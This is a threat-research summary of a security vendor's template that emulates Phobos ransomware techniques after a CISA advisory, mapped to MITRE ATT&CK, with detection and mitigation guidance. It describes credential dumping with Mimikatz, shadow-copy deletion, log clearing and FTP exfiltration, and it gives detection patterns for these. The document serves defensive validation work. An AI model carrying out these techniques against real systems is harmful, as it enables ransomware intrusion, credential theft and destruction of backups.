Threat Research

Response to CISA Advisory (AA24-060A): #StopRansomware: Phobos Ransomware

AttackIQ

AttackIQ published an assessment template that emulates the TTPs associated with Phobos ransomware to help organizations validate detection and prevention controls after CISA/FBI/MS-ISAC advisory AA24-060A. The template covers execution, persistence, defense evasion, credential harvesting, exfiltration, and impact techniques and includes detection and mitigation guidance. #Phobos #AttackIQ

Keypoints

  • AttackIQ released an assessment template that emulates Phobos ransomware behaviors mapped to ATT&CK techniques to validate security controls.
  • Phobos is a RaaS family related to Dharma/Crysis and commonly used with commodity tools such as SmokeLoader, Cobalt Strike, and BloodHound.
  • Emulated techniques include DLL side‑loading, mshta usage, registry Run keys and Startup LNK persistence, disabling firewall/UAC, clearing event logs, and deleting VSS snapshots.
  • Credential access and escalation are emulated using Mimikatz and access token manipulation, plus IFEO injection for privilege escalation.
  • Data collection, archiving (7zip), exfiltration via FTP, and file encryption routines (including in‑place encryption and shadow copy deletion) are included to emulate full attack impact.
  • AttackIQ provides detection cues (e.g., monitor DLL loads, suspicious comsvcs.exe access to lsass, vssadmin delete shadows command lines) and maps mitigations to MITRE recommendations.

MITRE Techniques

  • [T1574.002] DLL Side‑Loading – Bundles a DLL with a susceptible Windows executable to execute actor code (‘Bundles a DLL with a Windows executable that is susceptible to DLL Side‑Loading to execute actor code.’)
  • [T1218.010] Mshta (System Binary Proxy Execution) – Abuses mshta.exe to download and execute remote VBScript payloads (‘Mshta.exe is a native Windows utility that threat actors can abuse to download remote payloads that include VBScript code.’)
  • [T1547.001] Registry Run Keys / Startup Folder – Persists by setting HKLM Run keys and creating LNK files in the Startup folder to execute at logon (‘sets the HKLMSoftwareMicrosoftWindowsCurrentVersionRun registry keys’ / ‘creates a LNK file in this directory that would execute at the next Logon for all users.’)
  • [T1562.004] Disable or Modify System Firewall – Temporarily disables Windows Firewall via netsh advfirewall to allow network connections (‘temporarily disables the Windows Firewall using the netsh advfirewall utility.’)
  • [T1548.002] Bypass User Account Control – Attempts to disable UAC by modifying a registry key (‘The malware attempts to disable UAC by setting a registry key.’)
  • [T1070.001] Clear Windows Event Logs – Uses wevtutil.exe to clear event logs to remove indicators (‘will use the wevtutil.exe binary to clear event logs from the system.’)
  • [T1134] Access Token Manipulation – Enumerates and impersonates active access tokens to escalate privileges (‘lists active access tokens that could be impersonated by another process.’)
  • [T1546.012] Image File Execution Options Injection – Sets IFEO registry entries to achieve persistence or escalation (‘sets Image File Execution Options to the registry of a specific process.’)
  • [T1003 / T1003.001] OS Credential Dumping (LSASS memory) – Uses Mimikatz to dump passwords and hashes from LSASS memory (‘uses the Mimikatz credential access tool to dump passwords and hashes for Windows accounts.’)
  • [T1105] Ingress Tool Transfer – Downloads payloads to memory and disk to test delivery controls (‘downloads to memory and saves to disk in independent scenarios to test network and endpoint controls.’)
  • [T1082] System Information Discovery – Calls RtlGetVersion and NetWkstaGetInfo to enumerate system info (‘call RtlGetVersion(Ntdll), and NetWkstaGetInfo(Netapi32) Windows API calls to enumerate system information.’)
  • [T1057] Process Discovery – Uses CreateToolhelp32Snapshot and Process32* APIs to list running processes (‘receive a list of running processes by calling CreateToolhelp32Snapshot and iterating through each process object with Process32FirstW and Process32NextW.’)
  • [T1083] File and Directory Discovery – Uses dir command to find files of interest and output to a temp file (‘uses the native dir command to find files of interest and output to a temporary file.’)
  • [T1560.001] Archive via Utility – Compresses collected files into .7z archives with 7zip (‘compresses all the specified input files … to a .7z archive by executing the 7zip binary file.’)
  • [T1048] Exfiltration Over Alternative Protocols – Emulates exfiltration via FTP to an attacker server (‘start an FTP connection against an AttackIQ server to emulate the exfiltration of sensitive information’).
  • [T1490] Inhibit System Recovery – Runs vssadmin.exe to delete Volume Shadow Copies to prevent restoration (‘Runs vssadmin.exe to delete a recent Volume Shadow Copy created by the attack graph.’)
  • [T1486] Data Encrypted for Impact – Performs in‑place file encryption matching Phobos encryption routines (‘performs the file encryption routines used by common ransomware families … Files matching an extension list are identified and encrypted in place’).

Indicators of Compromise

  • [Process/Binary] Common Windows utilities abused – mshta.exe (used to download VBScript payloads), vssadmin.exe (used to delete Volume Shadow Copies), and comsvcs.exe (observed accessing LSASS), wevtutil.exe (clearing event logs)
  • [Tools/Frameworks] Post‑exploitation and loaders – Mimikatz (LSASS dumps), Cobalt Strike (beaconing/command and control), SmokeLoader (initial loader), BloodHound (AD enumeration)
  • [Files/Artifacts] Persistence and packaging artifacts – LNK file in Startup folder (startup persistence), HKLMSoftwareMicrosoftWindowsCurrentVersionRun registry keys (autostart), .7z archives produced by 7zip for collected data
  • [Commands/Command‑line patterns] Detection strings to watch – ‘vssadmin’ with ‘Delete Shadows’ in cmd.exe/powershell.exe command lines; Process Name == comsvcs and Command Line CONTAINS ‘lsass’ for credential dumping attempts
  • [URLs/Domains] Reference/analysis sources in the article – https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a (CISA advisory), https://www.attackiq.com/2024/03/01/response-to-cisa-advisory-aa24-060a/ (AttackIQ assessment)

AttackIQ’s technical assessment template focuses on reproducing Phobos operational steps so teams can validate controls across the full attack lifecycle. The emulation chain begins with execution techniques such as DLL side‑loading and mshta‑based payload retrieval, then establishes persistence via Run registry keys and Startup LNK files. Defense‑evasion actions include disabling the Windows Firewall (netsh advfirewall), attempting to disable UAC via registry modifications, and clearing event logs with wevtutil to remove forensic traces.

Post‑compromise behaviors in the template mirror real Phobos activity: discovery using Windows APIs and dir commands, process enumeration via CreateToolhelp32Snapshot/Process32* APIs, credential access through LSASS memory dumps with Mimikatz and access token manipulation, and privilege escalation using IFEO injection. The assessment also covers ingress/tool transfer (downloading payloads to memory/disk), collection/archiving with 7zip, exfiltration over FTP, deletion of Volume Shadow Copies via vssadmin, and in‑place file encryption routines similar to Phobos.

Detection guidance emphasizes monitoring for anomalous use of common binaries and command lines (e.g., mshta.exe downloading scripts, comsvcs.exe accessing lsass, cmd/powershell invoking vssadmin Delete Shadows), tracking DLL/PE creation/loading into processes to detect side‑loading, and alerting on clearing of event logs. Mitigations mapped to ATT&CK include enforcing application updates and hardening (M1051/M1013), restricting access to LSASS and privileged processes, enabling backup and recovery protections (M1053), and following CISA patching/detection recommendations to reduce risk exposure.

Read more: https://www.attackiq.com/2024/03/01/response-to-cisa-advisory-aa24-060a/